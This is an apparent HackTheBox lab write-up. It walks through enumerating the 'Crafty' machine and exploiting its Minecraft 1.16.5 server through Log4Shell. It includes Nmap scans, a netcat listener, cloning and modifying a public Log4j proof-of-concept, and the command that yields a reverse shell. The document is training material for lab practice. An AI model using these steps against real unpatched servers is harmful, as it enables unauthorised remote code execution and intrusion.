Exploit Minecraft Server | HackTheBox Crafty Walkthrough
In this post, we covered the solution of HackTheBox Crafty machine where we showcased the exploitation of a vulnerable Minecraft server to Log4j vulnerability using a Log4Shell payload.
Information Gathering and Enumeration
We start with an Nmap scan as shown below
nmap -p- --min-rate 10000 10.10.11.249
Starting Nmap 7.80 ( https://nmap.org ) at 2024-06-10 15:30 EDT
Nmap scan report for 10.10.11.249
Host is up (0.11s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
25565/tcp open minecraftNmap done: 1 IP address (1 host up) scanned in 13.58 seconds
nmap -p 80,25565 -sCV 10.10.11.249
Starting Nmap 7.80 ( https://nmap.org ) at 2024-06-10 15:30 EDT
Nmap scan report for 10.10.11.249
Host is up (0.11s latency).PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds
Minecraft Server Exploitation
Based on the nmap scan results, the Minecraft server is running on port 25565 which means we can connect to it using nc.
echo -ne "\xfe\x01" | nc crafty.htb 25565One of the most dangerous flaws found to date is Log4Shell. There is a flaw in the popular Java logging package Log4J that allows remote code execution. One popular service that was susceptible to Log4Shell was Minecraft.
The effects of Log4Shell on Minecraft are discussed here. In particular, the starting command line needs to be changed for versions 1.12–1.16.5 in order to patch it or upgrade to 1.17.
Start by downloading the Minecraft console client from here because you will need it to interact with the server and send the Log4J payload.
As shown below, we connect to the server using kali as a username and supply blank password along with the IP address of the crafty machine.
./MinecraftClient-20240415-263-linux-x64 kaliMinecraft Console Client v1.20.4 - for MC 1.4.6 to 1.20.4 - Github.com/MCCTeam
GitHub build 263, built on 2024-04-15 from commit 403284c
Password(invisible):
You chose to run in offline mode.
Server IP :
Resolving crafty.htb...
Retrieving Server Info...
Server version : 1.16.5 (protocol v754)
[MCC] Version is supported.
Logging in...
[MCC] Server is in offline mode.
[MCC] Server was successfully joined.
Type '/quit' to leave the server.
>Next step is to fire up a listener on your attacking machine
nc -lnvp 445
Listening on 0.0.0.0 445
Connection received on 10.10.11.249 49682Next is to download the POC , and install the requirements.
attacker@attacker$ git clone https://github.com/kozmer/log4j-shell-poc.git
attacker@attacker$ cd log4j-shell-poc/
attacker@attacker$ pip install -r requirements.txtBefore we start the exploit, we must first download the relevant Java binary from here and make sure to place it under the same directory of the POC exploit and rename it to jdk1.8.0_20
Next is to open the exploit POC python file, locate the line that says String cmd="/bin/sh";, and change it to String cmd="cmd.exe"; because the target OS here is Windows and /bin/sh won’t work on Windows.
And lastly, run the exploit:
python poc.py –userip 10.10.14.6 –webport 8000 –lport 445
Now jump back to the Minecraft console client and execute the given payload by the POC.
And this will return a shell to your previously-run listener.
c:\Users\svc_minecraft\Desktop> powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.PS C:\Users\svc_minecraft\Desktop>Full writeup can be found here
